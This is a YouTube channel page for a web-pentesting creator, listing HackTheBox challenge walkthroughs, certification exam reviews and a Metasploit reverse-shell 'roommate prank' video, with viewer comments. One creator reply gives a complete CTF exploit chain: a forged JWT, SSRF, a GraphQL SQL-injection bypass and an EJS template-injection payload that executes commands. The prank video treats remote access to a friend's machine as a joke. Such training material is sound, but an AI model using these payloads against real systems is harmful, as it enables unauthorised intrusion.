- 11
- 12 041
Milos Markovic
Приєднався 24 бер 2012
OSCP+ Exam Review 2024
In this video, I reviewed the OSCP+ Exam and what resources I used to prepare for it.
Переглядів: 402
Відео
How Online Copy-Paste Could Expose Your Data #cybersecurity
Переглядів 495 місяців тому
How Online Copy-Paste Could Expose Your Data #cybersecurity
CVE-2023-45539 & CVE-2022-39227 | HTB LockTalk Web Challange
Переглядів 775 місяців тому
In this video, I went over HTB LockTalk which includes CVE-2023-45539 & CVE-2022-39227.
Data Exfiltration using Curl and Python with SSTI RCE | HTB Labyrinth Linguist Web Challenge
Переглядів 2475 місяців тому
In this video, I went over Data exfiltration using Curl and Python with the help of Server Site Template Injection RCE.
Burp Suite Certified Practitioner Exam Review 2024
Переглядів 1 тис.6 місяців тому
In this video, I provide an in-depth review of the BSCP Exam, along with valuable tips and strategies to help you prepare and succeed.
Hack The Box Blueprint Heist Web Challenge
Переглядів 2816 місяців тому
In today's video, I went over the Blueprint Heist challenge from HTB Business CTF 2024.
Hack The Box Jailbreak Web Challenge
Переглядів 3536 місяців тому
In this video, I went over a recently retired HTB Challenge called Jailbreak which was about XXE Injection. Thank you for watching! #hackthebox #XXE #WebAppPentesting #burpsuite
Linux Privilege Escalation with SUID sed Command
Переглядів 247 місяців тому
In this video, I demonstrated a simple privilege escalation technique with the SUID bit set on the sed command. #cybersecurity #linux #privesc #pentesting
OpenVPN Peer Certificate Verification Failure #openvpn #hackthebox
Переглядів 7 тис.10 місяців тому
In this video, I explained how to overcome the "Peer Certificate Verification Failure" Error message from OpenVPN when connecting to HackTheBox Network from Windows Machine. P.S. I don't know why my mouse is not showing up on the video, sorry for that!
Hacking My Roommate with Metasploit Reverse Shell!
Переглядів 2,3 тис.Рік тому
Hey, hackers and tech enthusiasts! 👋 In this video, I dive into the world of ethical hacking with a touch of humor as I explore the fascinating realm of Metasploit and reverse shells. Join me on this laughter-packed journey as I demonstrate how to use Metasploit for educational purposes, pranking friends in a lighthearted manner. We'll uncover the power of ethical hacking while sharing a few la...
Cloudgoat S3 ACL Error
Переглядів 177Рік тому
In this video, I talked about how to solve ACL Errors when deploying a Cloudgoat scenario that has an S3 bucket in its resources.
Great video Milos!
Thanks a lot, Culi! :)
didn't work. still get the same error
But how do i solve it on Android?
@@Baikanikintrist Hello, thanks for watching! That is a great question!Unfortunately I didn’t test it out on Android so I don’t have an answer.
Hey thanks for the tutorial. But how did you know that the flag.txt is in the root directory? What if the flag.txt was in a folder and in another subfolder etc. ...How to find out?
Hello, no problem, thank you for watching! That is an amazing question! So in this particular scenario, after I identified XML Injection by being able to read /etc/passwd, my next payload was for the flag.txt. So I didn't spend too much time trying to read the flag from other directories such as /home/flag.txt or /var/www/html/flag.txt, etc.When it comes to XXE usually you would try to read local files that are mostly present on every system such as /etc/passwd for UNIX machines or C:/Windows/win.ini on Windows boxes, it can be challenging with XXE to enumerate other files that are not common. In this case, with HTB Challenges we know that we are aiming for flag.txt so if I didn't find it with a payload such as file:///flag.txt I would try different directories such as /home/flag.txt or /opt/flag.txt or similar. I think for this challenge they simply placed it in the current directory so you don't have to spend time enumerating the system for a flag, bur rather exploiting XXE Injection. I hope this helps! Please let me know if you have any other questions/thoughts!
Can we use Burp Pro Trial[15 days] version ? On exam?
Thank you for watching! That's a great question! I didn't find much online about this question besides this old Blog Post from PortSwigger's Forum all the way back in 2021: forum.portswigger.net/thread/free-trial-cf41d2d7bc962fd966d168dbd (you might need to scroll down to find a question from user named Tony). According to the PortSwigger reply, they do not check whether you are using a personal license or a company license nor do we check if you are using a purchased license or a trial license. Now since this was 2021, things might have changed. I think it's the best bet to ask in their Discord: discord.com/invite/portswigger
How much did this certification help you to become a web application penetration tester?
Thank you for watching and thank you for the great question! This certificate is by far my favorite one because I enjoy web app pentesting and I love AppSec. If you would like to become a web application pentester I do believe that this certificate can help you a lot because of wide variety of topics that it covers, and it really forces the learner to understand each vulnerability in depth. This is from knowledge perspective, when it comes to Job Requirement Perspective, I don't have much experience there because I got this certificate after I landed a job, but when I was actively searching for a job I saw multiple job posting listing BSCP as preferred / required cert. Regardless if it's being listed in the Job Description or not, I think this is an amazing cert and it helped me a lot when it comes to exploiting different vulnerabilities and understanding those vulnerabilities / misconfiguration better than before. I hope this helps!
you saved my life lol, ty
@@mikemd866 No problem! I am glad that video helped! 🙂
great explanation, btw can you put the exploits so we can copy thanks
Thank you very much! Here are my notes for this challenge with all commands:1)for /admin & /graphql endpoint i need a valid JWT cookie with a role being set to admin 1.1)I found a JWT Secret hardcoded --> Str0ng_K3y_N0_l3ak_pl3ase? and by using jwt.io I was able to forge a cookie and to set my role to be admin 2)I found SSRF when generating report and I was able to call Collaborator 3)I was able to access /admin by forging JWT Token with jwt.io to be equal to admin for user role and by passing url in the generate-report function as : 127.0.0.1/admin?token=<token> 4)I was able to execute GraphQL Queries with he following url 127.0.0.1:1337/graphql?token=<FORGED_ADMIN_TOKEN>&query={getDataByName(name:"John"){name,department,isPresent}} 5)Now this is vulnerable to SQLI because the reqex ignores everything afer newline character,so we are UNICODING not to break the GraphQL Query, and from there we conducted classing UNION BASED Attack to find out exact number of columns(4): 127.0.0.1:1337/graphql?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MTkwNzQyODB9.pEww2SEUcXqPFgdWzYPWBfYLNaIf-J-XMLFLm-ciRRU&query={getDataByName(name:"a\u000d\u000a'UNION SELECT NULL,NULL,NULL,NULL-- "){name,department,isPresent}} ---> note space afer comment since we are using MySQL 5.1)Now payload for combining sql injection with ejs code execution &query={getDataByName(name:"a\u000d\u000a'UNION SELECT '<%- global.process.mainModule.require(`child_process`).execSync(`/readflag`) %>',NULL,NULL,NULL INTO OUTFILE '/app/views/errors/404.ejs'-- "){name,department,isPresent}} 6)Now when we navigate to the nonexisting location 404.ejs will be triggered such as /test and we got the flag!
@@milosmarkovic4566 appreciate it
thanks a lot mate, you explain very well
@@imaverygoodguy Thank you very much for watching! I am glad that you found video useful ! 🙂
thank you
@@closevote Of course, it’s my pleasure! I am glad that video helped!
Thank you. How you became so good?
Of course! Haha far away from good, but thanks! :D
great video
@@noragami1555 Thank you! :)
Love it, Milos!!
Thank you! :)
This guy is going to be the best hacker in the world one day!
Haha, thanks Culi! :)
Im getting same error, was working fine for months and today I got this message, tried your solution and still not working...same error, help
Just had same error pls let me know if ya find a solution
Hmm, that is interesting! I will take a look at it, and I will let you know if I find a solution!
@@milosmarkovic4566 UPDATE: I sent an email to Dev and they were just having technical issues, it has been fixed :)
Thanks a lot
Of course, I am glad it helped!
Not working for me...
Hi, what did you try so far, and what is the error message that you are facing?
@@milosmarkovic4566 I've figure it out. I was trying first to make it work through WSL2, but then I've tried just regular windows openvpn client, which for some reason and give me this error, but actually the problem was in generated keys (I was playing around with tryhackme). Actually tryhackme, gives u multiple regions, only one for europe keys was working... the other regions (even europe) was giving some errors both wsl2 or windows (in case of windows this error)
@@milosmarkovic4566 when i want to connect to tryhackme vpn
This was super helpful - thank you!
Thank you for watching! I am glad that video helped out! :)
Awesome, thank you!
No problem! Thank you for watching! :)
Thank you so much
Of course! I am glad that the video helped!
Can you do one more help? I got a foothold for a machine trying to load the RCE payload but when entering openvpn ip it's not giving me shell even though everything is correct
I would suggest checking your payload one more time, if you are successfully connected via OpenVPN there is no reason not to obtain the shell if everything is in place. I don't want to reveal any big spoilers, but I suggest checking what version of ysoserial you are using, and I was using PowerShell base64 encoded payload. I hope this helps!
Thank you so much 🙌🙌🙌
No Problem! I am glad that video helped! 🙂
Thank you Milos!
Thank you for watching!
Great content as usual!
Thank you a lot!
Bro thanks so much am ur new subscriber from Africa it realy help me coz i get this error for so long god bless more content 🎉🎉
Thank you very much! I am happy that the video helped out! I am working actively on more content! :)
i had similar problem with iOS and Android mobile connection, they play with this solution, thanks
I didn’t know that this error is occurring on mobile devices as well! I am glad that video helped!
in my machine, only your instruceted way can't solve this issue, so i regenrate the (.OVPN) file again. After that download and load it to OpenVpn apply your instructed setting and its booom. Connected ! [I said all of those things because some one might get sollution from my comment]
You are not the only one that had the same problem doing the same machine, ty
That’s right! I heard that many people were struggling with the same thing. No problem, I am glad it helped!
good tutorial make more for metasploit and reverse shell
Thank you! I appreciate it a lot! Noted, will do in the future, for sure!
Does this work if the victim is inside another network??
Hi, thanks for watching! In that case, I believe that would require port forwarding in order to make this happen.
Vanilla metasploit malware gets easily detected 🤣🤣
Yes, when you have AV and when you update your system, unlike my friend! That was the purpose of the video, to highlight the importance of it 🙂. Thank you for watching and commenting! 🙂
I wish you would have shown us your enumeration phase
Thank you for watching and I appreciate the suggestion! Next time I will definitely do so.
555-333 pod metaspoit bato odlican video
Haha!!! Hvala puno lucky! 😁😂
Samo nastavi ovako odlicno ti ide
@@l_u_c_k_y_7 Hocu, hvala!!
This is the dumbest script kid video I’ve seen, and to all the people in the comments thinking this is real hacking, ITS NOT! So first, any msfvenom payload is gonna get flagged by AV. It takes a professional to be able to correctly obfuscate the signatures these days. Secondly, why are you even hiding IP addresses on the video? You do know that those IPs are only on your local network right? They’re not actually the real public IPs. If you guys want to learn real offensive security go study with reliable sources, not some script kids
i just want to know why y u hiding your internal ip addres
Hi! I just didn't want it exposed, that's all :)
1 sub earned - love this videos
Thank you! It’s much appreciated!
haha very cool, im a sub now. hilarious prank dude XD
Thank you @RAZREXE ! Much appreciated!!
hahaha that smile on your face when he finds out.
Haha, that was more than funny! 😂
Can I study with you🙏...
Of course! Find me on Discord @wr00m_
I was going to ask the same thing.@@milosmarkovic4566
Cool stuff, we need more videos like this!
Thanks Dragan!!
Hahahah this is hilarious dude… great work on this one!
Thanks Filip!!
Haha, brilliant! I will definitely use this to prank my friends!
Thanks Marko!!